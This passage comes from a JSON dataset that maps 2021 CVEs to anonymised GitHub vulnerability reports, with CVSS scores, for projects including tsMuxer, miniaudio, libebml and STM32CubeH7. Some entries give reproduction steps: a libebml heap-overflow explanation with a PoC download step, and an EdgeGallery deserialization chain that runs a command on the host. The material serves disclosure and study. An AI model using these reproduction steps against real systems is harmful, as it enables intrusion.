  67891. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/85",
  67892. "Repo_new": "yeraze/ytnef",
  67893. "Issue_Created_At": "2021-01-30T11:51:22Z",
  67894. "description": "Double free via APITAG While it seems there are many checks which ought to prevent various memory corruption situations it seems there's a double free that can be triggered still. With ASAN and some crafted input: ERRORTAG Manually instrumenting the code shows that indeed the same memory is freed twice: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
  67895. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67896. "severity": "HIGH",
  67897. "baseScore": 7.8,
  67898. "impactScore": 5.9,
  67899. "exploitabilityScore": 1.8
  67900. },
  67901. {
  67902. "CVE_ID": "CVE-2021-3404",
  67903. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/86",
  67904. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/86",
  67905. "Repo_new": "yeraze/ytnef",
  67906. "Issue_Created_At": "2021-01-30T11:51:28Z",
  67907. "description": "Heap buffer overflow via APITAG A heap buffer overflow can be triggered with crafted input, despite ytnef recognizing that the provided input file is not valid: ERRORTAG However when built with ASAN we see that APITAG attempts to read invalid memory before said error message can be printed: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
  67908. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67909. "severity": "HIGH",
  67910. "baseScore": 7.8,
  67911. "impactScore": 5.9,
  67912. "exploitabilityScore": 1.8
  67913. },
  67914. {
  67915. "CVE_ID": "CVE-2021-3405",
  67916. "Issue_Url_old": "https://github.com/Matroska-Org/libebml/issues/74",
  67917. "Issue_Url_new": "https://github.com/matroska-org/libebml/issues/74",
  67918. "Repo_new": "matroska-org/libebml",
  67919. "Issue_Created_At": "2021-02-07T14:10:51Z",
  67920. "description": "APITAG heap overflow bug on NUMBERTAG bit builds NUMBERTAG Summary An extremely exploitable heap overflow bug exists in the implementation of APITAG and APITAG in libebml. This bug is reachable from the current stable release of vlc NUMBERTAG Discussion The issue exists in the calculation of the required buffer size to store the string. The following calculation is performed NUMBERTAG auto Buffer = new (std::nothrow) APITAG NUMBERTAG APITAG APITAG The value returned from APITAG is guaranteed to be an unsigned NUMBERTAG bit number, and due to the way in which integers are stored and parsed in Ebml will only use the lowest NUMBERTAG bits. This guarantees that the integer cannot overflow on NUMBERTAG bit builds. However, on NUMBERTAG bit builds, the value is implicitly cast to a size_t in the call to new, meaning that the truncated length can be significantly shorter than the amount of data to be copied. For example, if the length of the string element is claimed to be NUMBERTAG ffffffff, the resultant allocation will be NUMBERTAG The cast to a NUMBERTAG bit size_t drops the top NUMBERTAG bit, meaning an array of size zero is allocated. In the event that the string element is placed maliciously at the end of the file to be parsed, an extremely exploitable controlled heap overflow can occur NUMBERTAG Resolution The fix for this bug is relatively straightforward: a check must be added to ensure that the value of APITAG NUMBERTAG is less than SIZE_MAX to ensure that it will not be truncated in the call to new NUMBERTAG Proof of Concept The following proof of concept file shows the behaviour in the latest (at time of writing) version of vlc on Ubuntu NUMBERTAG sudo apt install vlc:i NUMBERTAG gdb $ wget FILETAG $ gdb q vlc $$ r libebml poc.mkv",
  67921. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67922. "severity": "MEDIUM",
  67923. "baseScore": 6.5,
  67924. "impactScore": 3.6,
  67925. "exploitabilityScore": 2.8
  67926. },
  67927. {
  67928. "CVE_ID": "CVE-2021-34066",
  67929. "Issue_Url_old": "https://github.com/EdgeGallery/developer-be/issues/1",
  67930. "Issue_Url_new": "https://github.com/edgegallery/developer-be/issues/1",
  67931. "Repo_new": "edgegallery/developer-be",
  67932. "Issue_Created_At": "2021-05-25T08:46:01Z",
  67933. "description": "There is a Deserialization vulnerability that can execute system command.. vulnerability type: Deserialization of Untrusted Data impact: system command execution app version: Edgegallery/developer NUMBERTAG Create a META INF/services file, and create a APITAG file, and write what needs to be loaded The name of the class is pocy, and the files of this class are placed in the same directory as META INF: FILETAG NUMBERTAG File content: FILETAG NUMBERTAG Start an httpserver server: APITAG NUMBERTAG Prepare yaml POC: APITAG NUMBERTAG Install and access the APITAG module, click APITAG and debug\" > APITAG FILETAG NUMBERTAG Upload the constructed yaml file FILETAG Click to upload the created yaml file. FILETAG NUMBERTAG iew the request information of the http server: FILETAG NUMBERTAG Construct the pocy of the creation command: (contain the \"touch /tmp/hackercor0ps\" command) ERRORTAG NUMBERTAG Log in to the host and verify whether the command is executed successfully. FILETAG We can see that the \u201ctouch /tmp/hackercor0ps\u201d command was successfully executed.",
  67934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67935. "severity": "CRITICAL",
  67936. "baseScore": 9.8,
  67937. "impactScore": 5.9,
  67938. "exploitabilityScore": 3.9
  67939. },
  67940. {
  67941. "CVE_ID": "CVE-2021-34067",
  67942. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/424",
  67943. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/424",
  67944. "Repo_new": "justdan96/tsmuxer",
  67945. "Issue_Created_At": "2021-05-22T16:27:48Z",
  67946. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 APITAG version git f6ab2a2. PATHTAG This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default NUMBERTAG alue. HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from NUMBERTAG to NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eaf2 at pc NUMBERTAG c bp NUMBERTAG ffc6a2a NUMBERTAG sp NUMBERTAG ffc6a2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eaf2 thread T NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG int, int) PATHTAG NUMBERTAG af in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG f NUMBERTAG in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG bfa4 in APITAG char , int) PATHTAG NUMBERTAG d0b NUMBERTAG in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG eaf5 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in operator APITAG long) ( PATHTAG NUMBERTAG in APITAG char const , unsigned char const ) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c 
NUMBERTAG fffbd NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbda0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
  67947. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67948. "severity": "MEDIUM",
  67949. "baseScore": 5.5,
  67950. "impactScore": 3.6,
  67951. "exploitabilityScore": 1.8
  67952. },
  67953. {
  67954. "CVE_ID": "CVE-2021-34068",
  67955. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/427",
  67956. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/427",
  67957. "Repo_new": "justdan96/tsmuxer",
  67958. "Issue_Created_At": "2021-05-24T18:09:22Z",
  67959. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Asan output: ERRORTAG",
  67960. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67961. "severity": "MEDIUM",
  67962. "baseScore": 5.5,
  67963. "impactScore": 3.6,
  67964. "exploitabilityScore": 1.8
  67965. },
  67966. {
  67967. "CVE_ID": "CVE-2021-34069",
  67968. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/428",
  67969. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/428",
  67970. "Repo_new": "justdan96/tsmuxer",
  67971. "Issue_Created_At": "2021-05-24T18:10:51Z",
  67972. "description": "Denial of Service in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec . System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG ASAN output: ERRORTAG",
  67973. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67974. "severity": "MEDIUM",
  67975. "baseScore": 5.5,
  67976. "impactScore": 3.6,
  67977. "exploitabilityScore": 1.8
  67978. },
  67979. {
  67980. "CVE_ID": "CVE-2021-34070",
  67981. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/426",
  67982. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/426",
  67983. "Repo_new": "justdan96/tsmuxer",
  67984. "Issue_Created_At": "2021-05-24T13:22:08Z",
  67985. "description": "Out of bounds Read in APITAG of APITAG Greetings, APITAG has an Out of bounds Read issue whenever it runs with the APITAG sample. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Chronological Function Call Trace NUMBERTAG APITAG const , APITAG , bool) PATHTAG NUMBERTAG APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG APITAG char , int) PATHTAG NUMBERTAG APITAG PATHTAG NUMBERTAG APITAG PATHTAG Root Cause of The Issue: Constant integer arrays are defined in APITAG APITAG However, the array index nr is set to NUMBERTAG therefore nr NUMBERTAG is larger than the boundary of the array ff_vc1_fps_nr. CODETAG A similar \"demo\" issue is also shared on the following page: [ URLTAG URLTAG I'm sharing the link above, because ASAN declares this issue as \"global buffer overflow\" but as shared in References and root cause sections this is actually an OOB read issue. Recommendation: Editing size check of \"array index\" within \"if condition\" in line NUMBERTAG might fix this \"particular\" issue. An additional check of index variables (dr and nr) for NUMBERTAG is recommended. APITAG Fix: APITAG References: FILETAG Address Sanitizer Output: ERRORTAG",
  67986. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67987. "severity": "MEDIUM",
  67988. "baseScore": 5.5,
  67989. "impactScore": 3.6,
  67990. "exploitabilityScore": 1.8
  67991. },
  67992. {
  67993. "CVE_ID": "CVE-2021-34071",
  67994. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/423",
  67995. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/423",
  67996. "Repo_new": "justdan96/tsmuxer",
  67997. "Issue_Created_At": "2021-05-22T16:27:04Z",
  67998. "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 Asan output: APITAG version git f6ab2a2. PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f5 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffebdd7b NUMBERTAG sp NUMBERTAG ffebdd7b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f5 thread T NUMBERTAG f NUMBERTAG in APITAG int) PATHTAG NUMBERTAG e NUMBERTAG in APITAG char , int) PATHTAG NUMBERTAG ceacc in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb1de NUMBERTAG a NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG f5 is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  67999. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68000. "severity": "MEDIUM",
  68001. "baseScore": 5.5,
  68002. "impactScore": 3.6,
  68003. "exploitabilityScore": 1.8
  68004. },
  68005. {
  68006. "CVE_ID": "CVE-2021-3410",
  68007. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/52",
  68008. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/52",
  68009. "Repo_new": "cacalabs/libcaca",
  68010. "Issue_Created_At": "2021-02-14T02:07:08Z",
  68011. "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG",
  68012. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  68013. "severity": "HIGH",
  68014. "baseScore": 7.8,
  68015. "impactScore": 5.9,
  68016. "exploitabilityScore": 1.8
  68017. },
  68018. {
  68019. "CVE_ID": "CVE-2021-34122",
  68020. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/36",
  68021. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/36",
  68022. "Repo_new": "rockcarry/ffjpeg",
  68023. "Issue_Created_At": "2021-05-13T09:08:27Z",
  68024. "description": "null pointer dereference in function APITAG in bitstr.c. Hi, There is null pointer dereference in function APITAG and APITAG in bitstr.c. Didn't check whether the stream is valid . CODETAG version NUMBERTAG ab ERRORTAG e (latest one) env ubuntu NUMBERTAG gcc version NUMBERTAG reproduce: make ./ffjpeg e poc FILETAG debug info CODETAG",
  68025. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  68026. "severity": "MEDIUM",
  68027. "baseScore": 5.5,
  68028. "impactScore": 3.6,
  68029. "exploitabilityScore": 1.8
  68030. },
  68031. {
  68032. "CVE_ID": "CVE-2021-34129",
  68033. "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/9",
  68034. "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/9",
  68035. "Repo_new": "bettershop/laiketui",
  68036. "Issue_Created_At": "2021-06-01T15:55:50Z",
  68037. "description": "Arbitrary file deletion leads to system reinstallation vulnerabilities. When the system is successfully installed, the system will generate the APITAG file in the /data/ directory. When the user wants to reinstall, it will first determine whether the APITAG file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the APITAG file, you can directly reinstall the system. The parameters APITAG $oldpic, and $imgurl are all controllable\uff1a FILETAG Vulnerability recurrence: first log in to the background to access the link : URLTAG domain PATHTAG then publish an article. FILETAG Then modify the article: FILETAG Before proceeding with any file deletion, visit the install directory: FILETAG Replace parameters and delete any files: FILETAG FILETAG Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities. FILETAG ERRORTAG",
  68038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  68039. "severity": "HIGH",
  68040. "baseScore": 8.1,
  68041. "impactScore": 5.2,
  68042. "exploitabilityScore": 2.8
  68043. },
  68044. {
  68045. "CVE_ID": "CVE-2021-34141",
  68046. "Issue_Url_old": "https://github.com/numpy/numpy/issues/18993",
  68047. "Issue_Url_new": "https://github.com/numpy/numpy/issues/18993",
  68048. "Repo_new": "numpy/numpy",
  68049. "Issue_Created_At": "2021-05-12T02:04:35Z",
  68050. "description": "Unsecure string comparison (incomplete comparison) in _convert_from_str of descriptor.c. APITAG Reproducing code example: Snippet : / Check for a deprecated Numeric style typecode / / Uint has deliberately weird uppercasing / char dep_tps FILETAG APITAG version information: the main branch of APITAG",
  68051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  68052. "severity": "MEDIUM",
  68053. "baseScore": 5.3,
  68054. "impactScore": 1.4,
  68055. "exploitabilityScore": 3.9
  68056. },
  68057. {
  68058. "CVE_ID": "CVE-2021-34184",
  68059. "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/319",
  68060. "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/319",
  68061. "Repo_new": "mackron/miniaudio",
  68062. "Issue_Created_At": "2021-06-06T15:45:59Z",
  68063. "description": "Double free vulnerability cause buffer overflow. Hi Team, Double Free vulnerability cause buffer overflow is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using ASAN with AFL FUZZER Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC1 Download link to POC1 URLTAG OUTPUT APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG in thread T NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG NUMBERTAG f NUMBERTAG in __interceptor_fclose ( PATHTAG NUMBERTAG b7e0b in ma_default_vfs_close__stdio .. APITAG NUMBERTAG b7e0b in ma_default_vfs_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_decoder_init_vfs .. APITAG NUMBERTAG in ma_decoder_init_file .. APITAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f NUMBERTAG bc8 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG aad in _IO_fopen ( PATHTAG ) SUMMARY: APITAG double free ( PATHTAG ) in __interceptor_free NUMBERTAG ABORTING Request team to implement proper patch and validate",
  68064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68065. "severity": "CRITICAL",
  68066. "baseScore": 9.8,
  68067. "impactScore": 5.9,
  68068. "exploitabilityScore": 3.9
  68069. },
  68070. {
  68071. "CVE_ID": "CVE-2021-34185",
  68072. "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/320",
  68073. "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/320",
  68074. "Repo_new": "mackron/miniaudio",
  68075. "Issue_Created_At": "2021-06-06T15:51:52Z",
  68076. "description": "Integer based buffer overflow vulnerability. Hi Team, Integer based buffer overflow caused by out of bound left shift is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using UBSAN enabled in AFL FUZZER Vulnerable code from miniaudio.h DRWAV_API drwav_uint NUMBERTAG drwav_bytes_to_u NUMBERTAG const drwav_uint8 data) { return (data NUMBERTAG data NUMBERTAG data NUMBERTAG data NUMBERTAG Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC2 Download link to [POC2 URLTAG OUTPUT .. APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' Request team to implement proper patch and validate",
  68077. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  68078. "severity": "HIGH",
  68079. "baseScore": 7.8,
  68080. "impactScore": 5.9,
  68081. "exploitabilityScore": 1.8
  68082. },
  68083. {
  68084. "CVE_ID": "CVE-2021-34254",
  68085. "Issue_Url_old": "https://github.com/umbraco/Umbraco-CMS/issues/9782",
  68086. "Issue_Url_new": "https://github.com/umbraco/umbraco-cms/issues/9782",
  68087. "Repo_new": "umbraco/umbraco-cms",
  68088. "Issue_Created_At": "2021-02-09T07:16:26Z",
  68089. "description": "NUMBERTAG Open redirect security issue insufficient url sanitization on APITAG Summary A security report alerted us to an issue where APITAG could be used as an open redirect URLTAG , which is used for phishing attacks, making it seem that the URL you're clicking is a legitimate site, but you get redirected to a malicious site by that legitimate site. Note that anybody trying to use this vulnerability on your Umbraco site would see the following interstitial page for NUMBERTAG seconds: FILETAG Severity We rate this as a medium-level security problem. Although the exploit is available for an unauthenticated attacker, no data can be altered on the target Umbraco site. Mitigation Umbraco NUMBERTAG mitigates the specific exploit method and we advise you to upgrade to that version. Workarounds for older versions Alternatively, for any site with a version lower than NUMBERTAG we recommend you remove APITAG , which will mitigate the problem as well. This file is not often in active use and is therefore safe to remove for most people. Alternatively, if you think your site is often displaying the booting screen, you can update this page, with FILETAG . Please note that your deployment strategy might include a APITAG restore which will restore APITAG on each deploy; make sure to take steps to prevent this file from being deployed. Similarly, if you do update APITAG without upgrading to Umbraco NUMBERTAG APITAG will overwrite it, so make sure that you only deploy the updated version. Credits We'd like to thank Marcin W\u0119g\u0142owski and Mariusz Pop\u0142awski from FILETAG for reporting the issue and validating the fix.",
  68090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  68091. "severity": "MEDIUM",
  68092. "baseScore": 6.1,
  68093. "impactScore": 2.7,
  68094. "exploitabilityScore": 2.8
  68095. },
  68096. {
  68097. "CVE_ID": "CVE-2021-34259",
  68098. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/76",
  68099. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/76",
  68100. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68101. "Issue_Created_At": "2020-10-14T22:38:58Z",
  68102. "description": "No validity checking on the variable cfg_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. However, it doesn\u2019t check the validity of the variable cfg_desc APITAG compared with the total length of the input buffer as shown in URLTAG This will cause the following program including calling to the function APITAG APITAG and APITAG configure the system incorrectly. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context To patch it, the program should check if reach the end of input buffer when plus cfg_desc APITAG FILETAG",
  68103. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68104. "severity": "MEDIUM",
  68105. "baseScore": 6.8,
  68106. "impactScore": 5.9,
  68107. "exploitabilityScore": 0.9
  68108. },
  68109. {
  68110. "CVE_ID": "CVE-2021-34260",
  68111. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/83",
  68112. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/83",
  68113. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68114. "Issue_Created_At": "2020-10-14T23:17:15Z",
  68115. "description": "Buffer Overflow due to the variable if_descriptor APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG if_descriptor, uint8_t buf) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parse interface descriptor. It\u2019s called by the function APITAG as shown in URLTAG It doesn\u2019t check the validity of the variable if_descriptor APITAG compared with the total length of the input buffer which may cause a buffer overflow by the following called function APITAG as shown in URLTAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if reach the end of the input buffer when plus if_descriptor APITAG",
  68116. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68117. "severity": "MEDIUM",
  68118. "baseScore": 6.8,
  68119. "impactScore": 5.9,
  68120. "exploitabilityScore": 0.9
  68121. },
  68122. {
  68123. "CVE_ID": "CVE-2021-34261",
  68124. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/78",
  68125. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/78",
  68126. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68127. "Issue_Created_At": "2020-10-14T22:46:03Z",
  68128. "description": "Lack hardware wake up support checking. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Denial of Service. Result: The system will hang when trying to set a remote wake up feature. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. And it set the variable cfg_desc APITAG by the input data from the USB device. This variable will be used as part of a judgment in the function APITAG as shown in URLTAG With a malformed value, the remote wakeup may be enabled as shown in URLTAG If the hardware doesn\u2019t support this feature, the system will hang due to a FAIL return value by the function APITAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet Additional context To patch it, the program should check if the hardware supports a remote wake up FILETAG feature.",
  68129. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  68130. "severity": "MEDIUM",
  68131. "baseScore": 4.6,
  68132. "impactScore": 3.6,
  68133. "exploitabilityScore": 0.9
  68134. },
  68135. {
  68136. "CVE_ID": "CVE-2021-34262",
  68137. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/81",
  68138. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/81",
  68139. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68140. "Issue_Created_At": "2020-10-14T22:57:52Z",
  68141. "description": "No checking if ep_descriptor APITAG is greater than zero. Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG ep_descriptor, uint8_t buf) Location: URLTAG Type: Denial of Service. Result: The system will hang when try to communicate with the endpoint. Description: The function APITAG parses the endpoint descriptor of a USB device. It doesn\u2019t check if the variable ep_descriptor APITAG is greater than zero as shown in URLTAG If zero, the MSC handler will not able to communicate with the outside world as shown from line NUMBERTAG to line NUMBERTAG in FILETAG How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a USB disk NUMBERTAG Use the attached FILETAG to replace the USB device packet. FILETAG Additional context To patch it, the program should check if ep_descriptor APITAG is greater than zero.",
  68142. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  68143. "severity": "MEDIUM",
  68144. "baseScore": 6.8,
  68145. "impactScore": 5.9,
  68146. "exploitabilityScore": 0.9
  68147. },
  68148. {
  68149. "CVE_ID": "CVE-2021-34267",
  68150. "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/80",
  68151. "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/80",
  68152. "Repo_new": "stmicroelectronics/stm32cubeh7",
  68153. "Issue_Created_At": "2020-10-14T22:56:01Z",
